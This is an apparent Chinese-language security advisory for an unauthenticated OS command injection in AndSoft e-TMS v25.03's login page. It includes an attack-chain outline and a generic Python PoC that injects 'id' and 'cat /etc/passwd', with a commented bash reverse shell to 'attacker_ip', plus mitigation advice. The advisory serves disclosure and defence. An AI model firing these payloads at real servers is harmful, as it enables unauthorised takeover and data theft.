CVE-2025-59736：AndSoft e-TMS 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-59736

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59736 是 AndSoft 公司开发的 e-TMS（电子运输管理系统）v25.03 版本中存在的一个高危操作系统命令注入漏洞。该漏洞的 CVSS 3.1 评分高达 9.8，属于严重级别。e-TMS 是一款广泛应用于物流和运输管理领域的软件系统，用于管理运输订单、车辆调度、货物跟踪等业务。

该漏洞存在于 e-TMS 系统的登录页面路径 '/clt/LOGINFRM_DJO.ASP' 中，具体涉及一个名为 'm' 的参数。攻击者可以通过构造恶意的 POST 请求，将操作系统命令注入到该参数中，从而在服务器端执行任意操作系统命令。由于该漏洞无需任何身份认证（PR:N）且无需用户交互（UI:N），攻击者可以通过网络远程利用，对服务器系统造成严重威胁。

该漏洞的影响范围涵盖机密性、完整性和可用性三个维度，均为高影响（C:H/I:H/A:H）。一旦漏洞被成功利用，攻击者可以完全控制受影响的服务器，窃取敏感业务数据、篡改运输管理信息、安装恶意软件，甚至将服务器作为跳板进行内网渗透。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并协调披露，披露日期为 2025 年 10 月 2 日。

技术细节

该漏洞是一个典型的操作系统命令注入（OS Command Injection）漏洞，存在于 AndSoft e-TMS v25.03 的 '/clt/LOGINFRM_DJO.ASP' 端点中。

漏洞原理：e-TMS 应用程序在处理用户登录请求时，未对 POST 请求中的 'm' 参数进行充分的输入验证和过滤。当应用程序接收到该参数的值后，直接将其传递给底层操作系统命令执行函数（如 system()、exec()、ShellExecute() 等），而没有进行任何安全处理。攻击者可以通过在该参数中注入特殊的 shell 元字符（如 ';'、'|'、'&&'、'||'、'$()' 等），将恶意操作系统命令附加到正常的参数值之后，从而实现命令注入。

利用方式：攻击者无需任何身份凭证，只需通过 HTTP POST 请求向目标服务器的 '/clt/LOGINFRM_DJO.ASP' 路径发送精心构造的恶意请求，在 'm' 参数中嵌入操作系统命令即可。服务器在处理该请求时，会执行攻击者注入的命令。由于该漏洞的利用复杂度低（AC:L），攻击者只需具备基本的 HTTP 请求构造能力即可利用。

危害程度：由于命令注入允许执行任意操作系统命令，攻击者可以执行包括但不限于以下操作：读取服务器上的敏感文件（如数据库配置文件、用户凭证等）、上传和下载任意文件、安装后门程序、创建新的系统用户、修改系统配置、窃取数据库中的运输业务数据、利用服务器进行内网横向移动等。考虑到 e-TMS 系统通常存储大量敏感的物流和客户数据，该漏洞的潜在危害极为严重。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过 Shodan、Censys 等网络空间搜索引擎或端口扫描工具，识别暴露在公网上的 AndSoft e-TMS v25.03 服务器，确认目标系统存在该漏洞。

STEP 2

步骤2：构造恶意请求

攻击者构造一个 HTTP POST 请求，目标路径为 '/clt/LOGINFRM_DJO.ASP'，在 'm' 参数中注入操作系统命令（如使用 ';'、'|' 等 shell 元字符拼接恶意命令）。

STEP 3

步骤3：发送攻击请求

攻击者通过工具（如 curl、Python requests、Burp Suite 等）向目标服务器发送构造好的恶意 POST 请求。由于无需认证，攻击者可以直接利用。

STEP 4

步骤4：命令执行

目标服务器在处理请求时，未对 'm' 参数进行过滤，直接将恶意命令传递给操作系统执行，攻击者的注入命令在服务器上成功执行。

STEP 5

步骤5：服务器接管

攻击者通过命令执行获得服务器控制权限，可以读取敏感数据、安装后门、横向移动到内网其他系统，造成严重的数据泄露和系统破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59736 - AndSoft e-TMS OS Command Injection PoC
# Vulnerability: OS Command Injection in 'm' parameter of /clt/LOGINFRM_DJO.ASP
# Affected: AndSoft e-TMS v25.03

import requests

TARGET_URL = "http://target-server/clt/LOGINFRM_DJO.ASP"

# Malicious payload - inject OS command via 'm' parameter
# The command injection uses shell metacharacters to execute arbitrary commands
payload = {
    "m": "valid_value; id"  # Replace 'valid_value' with a legitimate value if known, then append command
}

# Alternative payloads for different OS platforms:
# Windows: m=valid_value & whoami
# Linux:   m=valid_value; uname -a
# Reverse shell (Linux): m=valid_value; bash -i >& /dev/tcp/attacker_ip/4444 0>&1

response = requests.post(TARGET_URL, data=payload)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Example with command output extraction
payload_cmd = {
    "m": "x; cat /etc/passwd"
}
response = requests.post(TARGET_URL, data=payload_cmd)
if "root:" in response.text:
    print("[+] Command injection successful!")
    print(response.text)
else:
    print("[-] Injection may have failed or output not visible in response")

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）通过网络访问控制列表（ACL）限制 '/clt/LOGINFRM_DJO.ASP' 端点的访问，仅允许可信 IP 地址访问；2）在 Web 服务器或反向代理层面部署 WAF 规则，拦截包含常见命令注入特征（如 ';id'、'|whoami'、'&&cat' 等）的请求；3）将 Web 服务进程以最低权限运行，限制其对系统资源的访问；4）监控服务器的系统日志和网络流量，及时发现异常的命令执行行为；5）如果业务允许，临时关闭 e-TMS 的对外登录页面，仅通过内网访问。